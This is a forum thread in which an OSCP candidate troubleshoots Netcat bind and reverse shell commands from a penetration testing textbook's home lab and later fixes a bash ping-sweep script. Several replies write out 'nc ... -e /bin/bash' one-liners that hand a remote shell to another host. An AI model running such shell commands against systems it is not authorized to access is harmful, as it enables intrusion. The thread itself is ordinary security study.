OSCP help - Netcat

McxRisleyMcxRisley OSCP, CASP, CySA+, CPT+, Sec+, CEH, Splunk AdminMember Posts: 494 ■■■■■□□□□□
Hey guys! I am currently doing some prep study before I sign up for the OSCP and I was wondering if any of you would be able to help me with some issues I am having with Netcat. I am reading and doing the labs in Georgia Weidmans Penetration Testing book and I am unable to get the reverse shell code to work with Netcat. I know that Kali now comes with the OpenBSD version of Netcat which does not have the -e command. So I downloaded the old GNU 0.7.1 version that has the required command. The book calls for the following commands to entered into the shell.

In the first terminal enter:
[email protected]:~# nc -lvp 1234 -e /bin/bash

In the second terminal enter:
[email protected]:~# nc 192.168.20.9 1234

When I enter the second command into the second terminal it gives me the following message:
/bin/bash/ not found: connection reset by peer

and then it closes the connection. Any help or advice on this would be GREATLY appreciated since I have been unable to find any articles or anything about how to fix this issue anywhere.
I'm not allowed to say what my previous occupation was, but let's just say it rhymes with architect.

Comments

  • BlackBeretBlackBeret Member Posts: 684 ■■■■■□□□□□
    I would start by adding -v to the second command, this will increase the verbosity and may give you more to the error message. I'm not on my kali machine at the moment so I can't test this one, but try running '/bin/bash' locally and see if it runs a shell, also try '/bin/sh' to see if your default shell is something else.
  • ilikeshellsilikeshells Member Posts: 59 ■■□□□□□□□□
    You are doing a bind shell, not a reverse shell. Have you tried:

    #1: nc -nlvp 5555 # listen for incoming shell
    #2: nc -nv x.x.x.x 5555 -e /bin/bash # send shell.
  • McxRisleyMcxRisley OSCP, CASP, CySA+, CPT+, Sec+, CEH, Splunk Admin Member Posts: 494 ■■■■■□□□□□
    UPDATE: After doing some research I went home and entered '/bin/sh/' instead of '/bin/bash/' and it worked both ways. My next question is, is 'sh' the same as 'bash'? Also I am now having another issue with a bash script that runs a ping sweep on my local network. The script is:
    #!/bin/bash
    if [ "$1" == "" ]
    then
    echo "Usage: ./pingscript.sh [network]"
    echo "example: ./pingscript.sh 192.168.20"
    else
    for x in `seq 1 254`; do
    ping -c 1 $1.$x
    done
    fi

    The script returns:
    unknown host 192.168.0.seq

    I really appreciate the help guys. I am a newbie to Linux so sorry if these questions seem kinda dumb haha
    I'm not allowed to say what my previous occupation was, but let's just say it rhymes with architect.
  • BlackBeretBlackBeret Member Posts: 684 ■■■■■□□□□□
    /bin/sh is a link that points to your default shell. There are different shell programs on Linux, the default is usually bash, but if since you were having trouble with it there's no harm in pointing to /bin/sh and letting it redirect you to the default.
  • BlackBeretBlackBeret Member Posts: 684 ■■■■■□□□□□
    That script looks and runs fine in bash. I'm wondering if Kali is using something other than bash by default. Different shells will respond differently.

    If /bin/sh worked on the previous exercise when /bin/bash didn't type the following in to a command prompt:

    ls -alF /bin/sh

    Then look at what /bin/sh is pointing to, this will tell you what your default shell is.
  • McxRisleyMcxRisley OSCP, CASP, CySA+, CPT+, Sec+, CEH, Splunk Admin Member Posts: 494 ■■■■■□□□□□
    How would I check for that? I know it has to be something with my script because if I use nmap to perform a ping sweep it works just fine.
    I'm not allowed to say what my previous occupation was, but let's just say it rhymes with architect.
  • kaizen_404kaizen_404 Member Posts: 16 ■□□□□□□□□□
    McxRisley wrote: »
    UPDATE: After doing some research I went home and entered '/bin/sh/' instead of '/bin/bash/' and it worked both ways. My next question is, is 'sh' the same as 'bash'? Also I am now having another issue with a bash script that runs a ping sweep on my local network. The script is:
    #!/bin/bash
    if [ "$1" == "" ]
    then
    echo "Usage: ./pingscript.sh [network]"
    echo "example: ./pingscript.sh 192.168.20"
    else
    for x in `seq 1 254`; do
    ping -c 1 $1.$x
    done
    fi

    The script returns:
    unknown host 192.168.0.seq

    I really appreciate the help guys. I am a newbie to Linux so sorry if these questions seem kinda dumb haha

    There's a slight error in the script. Try this: for x in $(seq 1 254); do
Sign In or Register to comment.